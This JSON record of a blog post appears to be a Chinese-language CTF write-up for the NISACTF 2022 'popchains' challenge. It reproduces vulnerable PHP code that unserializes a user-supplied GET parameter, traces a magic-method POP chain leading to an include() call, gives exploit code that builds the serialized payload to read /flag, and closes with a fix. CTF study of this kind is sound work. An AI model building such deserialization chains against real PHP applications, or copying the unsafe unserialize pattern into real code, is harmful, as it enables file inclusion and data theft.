{"id":64,"date":"2024-09-29T21:32:11","date_gmt":"2024-09-29T13:32:11","guid":{"rendered":"http:\/\/www.xtmouse.top\/?p=64"},"modified":"2024-09-29T21:32:11","modified_gmt":"2024-09-29T13:32:11","slug":"pop%e9%93%be%e7%bb%8f%e5%85%b8%e5%ba%94%e7%94%a8","status":"publish","type":"post","link":"http:\/\/www.xtmouse.top\/index.php\/2024\/09\/29\/pop%e9%93%be%e7%bb%8f%e5%85%b8%e5%ba%94%e7%94%a8\/","title":{"rendered":"POP\u94fe\u7ecf\u5178\u5e94\u7528"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">[NISACTF 2022]popchains<\/h2>\n\n\n\n<p>\u9898\u76ee\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n\necho 'Happy New Year~ MAKE A WISH&lt;br>';\n\nif(isset($_GET&#91;'wish'])){\n    @unserialize($_GET&#91;'wish']);\n}\nelse{\n    $a=new Road_is_Long;\n    highlight_file(__FILE__);\n}\n\/***************************pop your 2022*****************************\/\n\nclass Road_is_Long{\n    public $page;\n    public $string;\n    public function __construct($file='index.php'){\n        $this->page = $file;\n    }\n    public function __toString(){\n        return $this->string->page;\n    }\n\n    public function __wakeup(){\n        if(preg_match(\"\/file|ftp|http|https|gopher|dict|\\.\\.\/i\", $this->page)) {\n            echo \"You can Not Enter 2022\";\n            $this->page = \"index.php\";\n        }\n    }\n}\n\nclass Try_Work_Hard{\n    protected  $var;\n    public function append($value){\n        include($value);\n    }\n    public function __invoke(){\n        $this->append($this->var);\n    }\n}\n\nclass Make_a_Change{\n    public $effort;\n    public function __construct(){\n        $this->effort = array();\n    }\n\n    public function __get($key){\n        $function = $this->effort;\n        return $function();\n    }\n}\n\/**********************Try to See flag.php*****************************\/ 
<\/code><\/pre>\n\n\n\n<p>\u601d\u8def\uff1a<\/p>\n\n\n\n<p>\u5148\u5f97\u627e\u5230\u6f0f\u6d1e\u70b9\uff0c<\/p>\n\n\n\n<p>1.\u53ef\u4ee5\u53d1\u73b0append\u51fd\u6570\u4e2d\u7684include($value)\u5b58\u5728\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c<\/p>\n\n\n\n<p>2.\u6267\u884cappend\u51fd\u6570\u9700\u8981\u89e6\u53d1__invoke\uff0c\u9700\u8981\u5bf9\u8c61\u88ab\u5f53\u4f5c\u51fd\u6570\u8c03\u7528\uff0c<\/p>\n\n\n\n<p>3.Try_Work_Hard\u88ab\u5f53\u4f5c\u51fd\u6570\u8c03\u7528\u9700\u8981\u89e6\u53d1Make_a_Change\u4e2d\u7684__get\uff0c<\/p>\n\n\n\n<p>4.\u89e6\u53d1__get\u9700\u8981Road_is_Long\u4e2d\u8c03\u7528__toString\uff0c<\/p>\n\n\n\n<p>5.\u8c03\u7528__toString\u9700\u8981\u89e6\u53d1__wakeup\u4e2d\u7684\u6b63\u5219\u5339\u914d\uff08preg_match\u4f1a\u628a$this->page\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\uff09\uff0c\u5e76\u4e14$this->page\u9700\u8981\u662fRoad_is_Long\u7c7b\u7684\u5bf9\u8c61<\/p>\n\n\n\n<p>\u6839\u672c\u539f\u56e0\u662f\u5bf9\u7528\u6237\u53ef\u63a7\u7684GET\u53c2\u6570wish\u76f4\u63a5\u8c03\u7528unserialize\uff1b\u4fee\u590d\u65f6\u4e0d\u5e94\u53cd\u5e8f\u5217\u5316\u4e0d\u53ef\u4fe1\u8f93\u5165\uff0c\u6216\u4f7f\u7528allowed_classes\u9009\u9879\u9650\u5236\u53ef\u5b9e\u4f8b\u5316\u7684\u7c7b\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n\/***************************pop your 2022*****************************\/\n\nclass Road_is_Long{\n    public $page;\n    public $string;\n}\n\nclass Try_Work_Hard{\n    protected  $var=\"\/flag\";\n    public function append($value){\n        include($value);\n    }\n    public function __invoke(){\n        $this->append($this->var);\n    }\n}\n\nclass Make_a_Change{\n    public $effort;\n\n}\n$a=new Road_is_Long();\n$a->page=$a;\n$a->string=new Make_a_Change();\n$a->string->effort=new Try_Work_Hard();\necho urlencode(serialize($a));<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>[NISACTF 2022]popchains \u9898\u76ee\u5982\u4e0b\uff1a \u601d\u8def\uff1a \u5148\u5f97\u627e\u5230\u6f0f\u6d1e\u70b9\uff0c 1.\u53ef\u4ee5\u53d1\u73b0append\u51fd\u6570\u4e2d\u7684include($value)\u5b58\u5728\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c 
&#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-64","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/64","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=64"}],"version-history":[{"count":1,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/64\/revisions"}],"predecessor-version":[{"id":65,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/64\/revisions\/65"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=64"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=64"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=64"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}